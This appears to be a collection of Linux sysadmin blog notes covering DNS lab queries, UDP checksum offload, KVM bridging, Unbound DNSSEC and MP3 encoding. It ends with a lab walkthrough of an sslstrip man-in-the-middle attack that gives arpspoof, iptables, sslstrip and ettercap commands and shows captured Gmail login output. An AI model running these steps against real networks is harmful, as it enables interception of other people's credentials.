; <<>> DiG 9.7.1 <<>> @192.168.1.51 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48652
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52

[root@hat4-vm ~]# dig @192.168.1.52 www.test.co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.52 www.test.co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65425
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;www.test.co.jp. IN A

;; ANSWER SECTION:
www.test.co.jp. 86400 IN A 10.0.0.1

;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.

;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52

Various other queries ( the answers seem to match those of dig @a.root-servers.net and dig @a.dns.jp, so the configuration is probably fine )

[root@hat4-vm ~]# dig @192.168.1.50 . +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 . +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59980
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;. IN A

;; AUTHORITY SECTION:
. 3600 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600

;; Query time: 1 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:29 2010
;; MSG SIZE  rcvd: 81

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.50 jp. +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 jp. +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38991
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 2 msec
;; SERVER: 192.168.1.50#53(192.168.1.50)
;; WHEN: Tue Jun 29 00:26:33 2010
;; MSG SIZE  rcvd: 56

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.50 co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.50 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39887
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;co.jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

[root@hat4-vm ~]# dig @192.168.1.51 jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28399
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;jp. IN A

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

;; Query time: 3 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:27:47 2010
;; MSG SIZE  rcvd: 73

[root@hat4-vm ~]# 

[root@hat4-vm ~]# dig @192.168.1.51 co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53030
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;co.jp. IN A

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

[root@hat4-vm ~]# dig @192.168.1.51 jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 670
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;jp. IN NS

;; ANSWER SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 6 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:28:32 2010
;; MSG SIZE  rcvd: 56

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.51 co.jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38325
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;co.jp. IN NS

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

About the UDP bad checksum errors seen when capturing ( UDP checksum offload )

Recent NICs compute the checksum on the NIC itself, so the checksum is filled in after the system (OS) has handed the packet over.

    capture happens here
system(OS) -----------------> NIC ---------->
        dummy checksum           real checksum


Because the capture is taken while the field still holds the dummy checksum, a checksum error is shown.

If bad checksums appear on transmit but not on receive, it is almost always this, not a NIC problem,
because received packets are captured after the checksum has already been verified.
In that case it is OK to ignore.

- transmit ( Bad checksum )

    Source: 192.168.1.1 (192.168.1.1)
    Destination: 128.63.2.53 (128.63.2.53)
User Datagram Protocol, Src Port: 33978 (33978), Dst Port: domain (53)
    Source port: 33978 (33978)
    Destination port: domain (53)
    Length: 53
    Checksum: 0x8975 [incorrect, should be 0x29bb (maybe caused by "UDP checksum offload"?)]
        [Good Checksum: False]
        [Bad Checksum: True]

- receive ( Good checksum )

    Source: 192.5.5.241 (192.5.5.241)
    Destination: 192.168.1.1 (192.168.1.1)
User Datagram Protocol, Src Port: domain (53), Dst Port: 38562 (38562)
    Source port: domain (53)
    Destination port: 38562 (38562)
    Length: 837
    Checksum: 0xceb4 [correct]
        [Good Checksum: True]
        [Bad Checksum: False]
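To see why only the transmitted datagram shows a wrong checksum, here is an added Python example (not part of the post) that computes the UDP checksum over the IPv4 pseudo-header and compares a normally checksummed datagram with one built the way Linux hands it to a NIC doing TX checksum offload, where the field holds only the pseudo-header partial sum for the NIC to finish. The addresses, ports and DNS payload are constructed samples, not the captured packet above.

```python
import socket
import struct


def ones_complement_sum(data):
    """Sum 16-bit big-endian words with end-around carry (RFC 1071); an odd trailing byte is zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def pseudo_header(src_ip, dst_ip, udp_len):
    """IPv4 pseudo-header covered by the UDP checksum: src, dst, zero byte, protocol 17, UDP length."""
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, socket.IPPROTO_UDP, udp_len))


def udp_checksum(src_ip, dst_ip, datagram):
    """Checksum for a UDP datagram (header + payload) whose checksum field is zeroed."""
    total = ones_complement_sum(pseudo_header(src_ip, dst_ip, len(datagram)) + datagram)
    csum = (~total) & 0xFFFF
    return csum or 0xFFFF   # RFC 768: a computed zero is sent as all-ones; zero on the wire means "no checksum"


def build_udp(src_ip, dst_ip, sport, dport, payload, offload=False):
    """Build a UDP datagram. offload=True mimics what a capture sees on a Linux host with TX checksum
    offload: the kernel stores only the pseudo-header partial sum (the 'dummy checksum') and the NIC
    finishes the sum after the capture point, so Wireshark reports the field as incorrect."""
    length = 8 + len(payload)
    if offload:
        csum = ones_complement_sum(pseudo_header(src_ip, dst_ip, length))
    else:
        csum = udp_checksum(src_ip, dst_ip, struct.pack("!HHHH", sport, dport, length, 0) + payload)
    return struct.pack("!HHHH", sport, dport, length, csum) + payload


def verify_udp(src_ip, dst_ip, datagram):
    """Return (is_correct, found, expected), like Wireshark's 'Checksum: X [incorrect, should be Y]'."""
    found = struct.unpack("!H", datagram[6:8])[0]
    zeroed = datagram[:6] + b"\x00\x00" + datagram[8:]
    expected = udp_checksum(src_ip, dst_ip, zeroed)
    if found == 0:
        return True, found, expected   # checksum disabled by the sender; nothing to verify
    return found == expected, found, expected


# Constructed sample: a DNS query for "jp" SOA, as a resolver would send to the root server.
SRC, DST = "192.168.1.80", "192.168.1.50"
SAMPLE_QUERY = bytes.fromhex("1234 0100 0001 0000 0000 0000" + "026a7000" + "0006 0001")

if __name__ == "__main__":
    good = build_udp(SRC, DST, 33978, 53, SAMPLE_QUERY)
    dummy = build_udp(SRC, DST, 33978, 53, SAMPLE_QUERY, offload=True)
    for label, pkt in (("kernel-computed", good), ("offloaded (captured before NIC)", dummy)):
        ok, found, expected = verify_udp(SRC, DST, pkt)
        print("%s: 0x%04x %s" % (label, found, "[correct]" if ok else "[incorrect, should be 0x%04x]" % expected))
```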

The errors are not counted

root@arizona:~# LANG=C netstat -s
Ip:
    17708 total packets received
    0 forwarded
    0 incoming packets discarded
    17454 incoming packets delivered
    12100 requests sent out
Icmp:
    9 ICMP messages received
    0 input ICMP message failed.
    ICMP input histogram:
        destination unreachable: 9
    9 ICMP messages sent
    0 ICMP messages failed
    ICMP output histogram:
        destination unreachable: 9
IcmpMsg:
        InType3: 9
        OutType3: 9
Tcp:
    23 active connections openings
    3 passive connection openings
    10 failed connection attempts
    2 connection resets received
    2 connections established
    17115 segments received
    11879 segments send out
    0 segments retransmited
    0 bad segments received.
    165 resets sent
Udp:
    226 packets received
    9 packets to unknown port received.
    0 packet receive errors
    216 packets sent
UdpLite:
TcpExt:
    10 TCP sockets finished time wait in fast timer
    105 delayed acks sent
    2 packets directly queued to recvmsg prequeue.
    13717 packet headers predicted
    1499 acknowledgments not containing data payload received
    477 predicted acknowledgments
    1 connections reset due to early user close
IpExt:
    InMcastPkts: 52
    OutMcastPkts: 37
    InBcastPkts: 103
    InOctets: 16864327
    OutOctets: 10701647
    InMcastOctets: 9908
    OutMcastOctets: 7260
    InBcastOctets: 12159
root@arizona:~#

Ubuntu Server : KVM , how to make a clone VM

 root@arizona:~# cat /etc/lsb-release | grep -i desc

DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

Virtual Machine Manager -> right-click the source VM -> select clone

Name the clone VM and click clone

Creating...

Done!


Gparted : free partition resizing software

While looking for something like Partition Magic, I found there is a free (GNU license) tool called gparted.

It can resize and create the following partitions.

ext2/ext3/ext4, FAT16/FAT32, hfs/hfs+, linux-swap, NTFS, reiserfs/4, ufs, xfs file systems

http://gparted.sourceforge.net/

GNOME boots from the live CD, and you can resize from the GUI.

I actually tried it, and in my environment it resized correctly.

Unbound : End-to-End DNSSEC w/ Firefox

There is a DNSSEC validation plugin for Firefox, so I tried it.

- prepare unbound

Assume the ITAR (IANA Interim Trust Anchor Repository) anchors are already set up

root@arizona:/etc/unbound# unbound -v
[1275843653] unbound[1701:0] notice: Start of unbound 1.4.1.

root@arizona:/etc/unbound# egrep "trust-anchor-file" unbound.conf | grep -v "#"
         trust-anchor-file: "/etc/unbound/anchors.mf"

- check that DNSSEC queries can be resolved

If the ad bit is set in the flags, it's OK

root@arizona:/etc/unbound# dig @127.1 www.isc.org +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.isc.org +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1402
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 5, ADDITIONAL: 9

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.isc.org.           IN A

;; ANSWER SECTION:
www.isc.org.            240 IN A 149.20.64.42
www.isc.org.            240 IN RRSIG A 5 3 600 2010070523333


When digging an FQDN that does not support DNSSEC, the ad bit is not set

root@arizona:/etc/unbound# dig @127.1 www.google.com +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.google.com +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22658
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.google.com.                IN A


unbound-host -C <config file> <FQDN> -v can also be used to check.

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.isc.org -v
[1275844036] libunbound[1821:0] notice: init module 0: validator
[1275844036] libunbound[1821:0] notice: init module 1: iterator
www.isc.org has address 149.20.64.42 (secure)
www.isc.org has IPv6 address 2001:4f8:0:2::d (secure)
www.isc.org has no mail handler record (secure)
root@arizona:/etc/unbound#

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.google.com -v
[1275844044] libunbound[1860:0] notice: init module 0: validator
[1275844044] libunbound[1860:0] notice: init module 1: iterator
www.google.com is an alias for www.l.google.com. (insecure)
www.l.google.com has address 66.249.89.104 (insecure)
www.l.google.com has address 66.249.89.99 (insecure)
www.l.google.com has no IPv6 address (insecure)
www.l.google.com has no mail handler record (insecure)

- add the DNSSEC validation add-on to Firefox 3.6.3

Download the add-on

https://addons.mozilla.org/en-US/firefox/addon/64247/

Usage

http://www.dnssec-validator.cz/

In Firefox -> Tools -> Add-ons, set the IP of a DNSSEC-capable caching server ( unbound in this case ).

Access www.isc.org, which resolves with DNSSEC.

An icon in the URL bar shows whether DNSSEC validation succeeded.

Red means the domain supports DNSSEC, but either the IP address has changed or the DNSSEC signature is broken.


root@arizona:~# unbound-host -C /etc/unbound/unbound.conf www.rhybar.cz -v
[1275845463] libunbound[4671:0] notice: init module 0: validator
[1275845463] libunbound[4671:0] notice: init module 1: iterator
www.rhybar.cz has address 217.31.205.50 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has IPv6 address 2001:1488:0:3::2 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has no mail handler record (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.12.1 for key rhybar.cz. while building chain of trust

Capture between Firefox -> caching server

The query is sent with the DO bit set.

    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 1
    Queries
        www.rhybar.cz: type A, class IN
            Name: www.rhybar.cz
            Type: A (Host address)
            Class: IN (0x0001)
    Additional records
        : type OPT
            Name:
            Type: OPT (EDNS0 option)
            UDP payload size: 4096
            Higher bits in extended RCODE: 0x0
            EDNS0 version: 0
            Z: 0x8000
                Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
                Bits 1-15: 0x0 (reserved)
            Data length: 0
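The dissection above can be reproduced in code. As an added example (not from the original post), the following Python builds the same kind of A query with an EDNS0 OPT record and then parses the OPT record back out of the raw bytes to report the DO bit; the transaction id and payload size are constructed values.

```python
import struct

OPT_TYPE = 41          # EDNS0 OPT pseudo-RR type (RFC 6891)
DO_BIT = 0x8000        # top bit of the OPT "Z" field: DNSSEC OK

def build_query(qname, do=True, udp_size=4096, txid=0x1234):
    """Build a DNS A/IN query with an EDNS0 OPT RR like the one Firefox sent
    to unbound above. do=False clears the DO bit; udp_size=None omits EDNS0."""
    arcount = 0 if udp_size is None else 1
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, arcount)  # RD=1, QDCOUNT=1
    q = b"".join(bytes([len(l)]) + l.encode("ascii")
                 for l in qname.rstrip(".").split("."))
    q += b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN
    if udp_size is None:
        return hdr + q
    # OPT RR: NAME=root, TYPE=41, CLASS=UDP payload size,
    # TTL=ext-RCODE(8) | version(8) | Z(16), RDLENGTH=0 (no options)
    ttl = (0 << 24) | (0 << 16) | (DO_BIT if do else 0)
    return hdr + q + b"\x00" + struct.pack("!HHIH", OPT_TYPE, udp_size, ttl, 0)

def _skip_name(pkt, off):
    """Advance past a (possibly compressed) domain name."""
    while True:
        l = pkt[off]
        if l == 0:
            return off + 1
        if l & 0xC0 == 0xC0:   # compression pointer: two bytes end the name
            return off + 2
        off += l + 1

def parse_opt(pkt):
    """Return the EDNS0 OPT fields of a DNS message, or None if it has none."""
    qd, an, ns, ar = struct.unpack("!HHHH", pkt[4:12])
    off = 12
    for _ in range(qd):
        off = _skip_name(pkt, off) + 4           # skip QTYPE + QCLASS
    for _ in range(an + ns + ar):
        off = _skip_name(pkt, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == OPT_TYPE:
            return {"udp_payload_size": rclass, "ext_rcode": ttl >> 24,
                    "version": (ttl >> 16) & 0xFF, "z": ttl & 0xFFFF,
                    "do": bool(ttl & DO_BIT), "rdlen": rdlen}
        off += rdlen
    return None

if __name__ == "__main__":
    print(parse_opt(build_query("www.rhybar.cz")))
```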


Ubuntu: encode n' play MP3 w/ Rhythmbox

root@arizona:~# cat /etc/lsb-release | grep -i desc
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# apt-get install ubuntu-restricted-extras

root@arizona:~# apt-get install lame


Launch Applications -> Sound & Video -> Rhythmbox

"Install MP3 plugin" is displayed; click it to install.



In Edit -> Preferences -> Music Player settings, set the format to MP3.



- Creating MP3s

"Copy all tracks to library" on the CD icon converts them to MP3.



Ubuntu server : KVM , how to create a network bridge

root@arizona:~# cat /etc/lsb-release | grep -i description
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# uname -r
2.6.32-22-server


By default, KVM guests run behind NAT (virtual network).
                                    
                     NAT           virtual network
Internet ---eth0  KVM host ----------VMs

eth0: 192.168.1.0/24
virbr0 ( virtual network ) : 192.168.122.0/24 ( the VMs' network )

Change this to a bridge so that the VMs are on the same network as the KVM host.

eth0: 192.168.1.0/24
br0 ( network bridge ) : 192.168.1.0/24

root@arizona:~# apt-get install bridge-utils

root@arizona:~# /etc/init.d/networking stop

Change the network configuration: create br0 and bridge it to eth0.

- before

root@arizona:~# egrep -v "^#" /etc/network/interfaces.org

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.150
netmask 255.255.255.0
gateway 192.168.1.254

root@arizona:~#

- after

root@arizona:~# egrep -v "^#" /etc/network/interfaces
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual

auto br0
iface br0 inet static
        address 192.168.1.150
        network 192.168.1.0
        netmask 255.255.255.0
        broadcast 192.168.1.255
        gateway 192.168.1.254
        bridge_ports eth0
        bridge_stp off
        bridge_fd 0
        bridge_maxwait 0

root@arizona:~#

root@arizona:~# /etc/init.d/networking start

After changing the network configuration, /etc/init.d/networking restart somehow did not work for me.
Doing stop -> start seems to be the better way.
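The before/after change that matters here is that eth0 loses its own address (inet manual) once it becomes a port of br0. As an added example (not from the original post), this Python parses an ifupdown /etc/network/interfaces and flags a bridge port that still carries its own IP configuration; GOOD is a copy of the "after" file above and BAD is a constructed broken variant.

```python
# Constructed copy of the "after" /etc/network/interfaces from this post.
GOOD = """\
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual

auto br0
iface br0 inet static
        address 192.168.1.150
        netmask 255.255.255.0
        gateway 192.168.1.254
        bridge_ports eth0
        bridge_stp off
"""

# Constructed broken variant: eth0 keeps a static address while also being
# enslaved to br0, so both interfaces would claim 192.168.1.150.
BAD = GOOD.replace("iface eth0 inet manual",
                   "iface eth0 inet static\n        address 192.168.1.150")

def parse_interfaces(text):
    """Parse ifupdown stanzas into {iface: {"method": m, "options": {k: v}}}."""
    stanzas, cur = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] == "iface":
            cur = parts[1]
            stanzas[cur] = {"method": parts[3], "options": {}}
        elif parts[0] in ("auto", "allow-hotplug", "mapping", "source"):
            cur = None            # these keywords end the current iface stanza
        elif cur is not None:
            stanzas[cur]["options"][parts[0]] = " ".join(parts[1:])
    return stanzas

def bridge_issues(stanzas):
    """Flag bridge ports that are missing or still have their own IP config."""
    issues = []
    for name, st in stanzas.items():
        for port in st["options"].get("bridge_ports", "").split():
            p = stanzas.get(port)
            if p is None:
                issues.append(f"{name}: bridge port {port} has no iface stanza")
            elif p["method"] != "manual" or "address" in p["options"]:
                issues.append(f"{name}: port {port} should be 'inet manual' with no address")
    return issues
```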

- before

root@arizona:~# LANG=C ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38
          inet addr:192.168.1.150  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8028 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11773 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2756850 (2.7 MB)  TX bytes:10669402 (10.6 MB)
          Interrupt:26 Base address:0xc000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:40 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2360 (2.3 KB)  TX bytes:2360 (2.3 KB)

virbr0    Link encap:Ethernet  HWaddr 3e:0d:65:a8:fe:e7
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::3c0d:65ff:fea8:fee7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:4760 (4.7 KB)


- after

br0 now exists and is bridged to eth0.

virbr0 is NAT
br0 is a bridge ( bridged to eth0 )

root@arizona:/etc/network# LANG=C ifconfig 
br0       Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38  
          inet addr:192.168.1.150  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45 errors:0 dropped:0 overruns:0 frame:0
          TX packets:54 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:4244 (4.2 KB)  TX bytes:6589 (6.5 KB)

eth0      Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38  
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:484 errors:0 dropped:0 overruns:0 frame:0
          TX packets:576 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:208113 (208.1 KB)  TX bytes:98061 (98.0 KB)
          Interrupt:26 Base address:0xc000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:56 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:5121 (5.1 KB)  TX bytes:5121 (5.1 KB)

virbr0    Link encap:Ethernet  HWaddr 2a:3e:0f:f6:b2:02  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::283e:fff:fef6:b202/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:4575 (4.5 KB)

When adding a network interface to a virtual machine, br0 can now be selected.



ifconfig after adding br0 to the VM and starting it

- ifconfig inside the VM. It is now on the same network as the KVM host's eth0.

[root@localhost ~]# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 52:54:00:0E:79:80
          inet addr:192.168.1.6  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe0e:7980/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6714 (6.5 KiB)  TX bytes:13514 (13.1 KiB)
          Interrupt:10 Base address:0xe000

Analyze ( strip ? ) SSL Traffic with sslstrip , arpspoof and ettercap

I had been using ssldump to decode SSL traffic, but was looking around for other good tools...
I tried decoding SSL traffic with sslstrip, arpspoof and ettercap.

SSL client: 192.168.1.2 ( Windows )
sslstrip, arpspoof, ettercap machine: 192.168.1.3 ( BackTrack Linux 4 final )

Internet --- Router 1.254  --- 1.3 Windows
                                   --- 1.2  eth0  BackTrack Linux 

[ sslstrip machine ]

- Edit the ettercap configuration file

Uncomment the following two lines:

ettercap  NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks


root@bt:# vi /etc/etter.conf

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

- Enable IP forwarding

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1


- Run arpspoof

arpspoof -t <target IP> <default gateway>

root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254


OPTIONS
       -i interface
              Specify the interface to use.

       -t target
              Specify a particular host to ARP poison (if not specified, all  hosts  on
              the LAN).

       host   Specify  the  host  you  wish to intercept packets for (usually the local
              gateway).


- Redirect destination port 80 to port 10000 ( sslstrip listens on port 10000 and strips the SSL traffic )

root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Start sslstrip

root@bt:~# sslstrip -a -f -k

sslstrip 0.6 by Moxie Marlinspike running...

- sslstrip is listening on port 10000

root@bt:~# lsof -i:10000
COMMAND   PID USER   FD   TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root    4u  IPv4  23821       TCP *:webmin (LISTEN)


root@bt:~# sslstrip --help

sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip

Options:
-w , --write= Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l , --listen=        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

- Packet capture

root@bt:~# ettercap -T -q -i eth0


Log in to Gmail from Windows ( IE ).

The username and password are visible. ( on the sslstrip machine )

root@bt:~# ettercap -T -q -i eth0

HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx

It can also be viewed as HTML ( -V html ).

root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE

GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP



-V, --visual
              Use this option to set the visualization method for the  packets
              to be displayed.

              FORMAT may be one of the following:



              hex    Print the packets in hex format.

                     example:

                     the string  "HTTP/1.1 304 Not Modified"  becomes:

                     0000:  4854 5450 2f31 2e31 2033 3034 204e 6f74  HTTP/1.1 304 Not
                     0010:  204d 6f64 6966 6965 64                    Modified


              ascii  Print only "printable" characters, the  others  are  dis-
                     played as dots '.'


              text   Print  only  the "printable" characters and skip the oth-
                     ers.


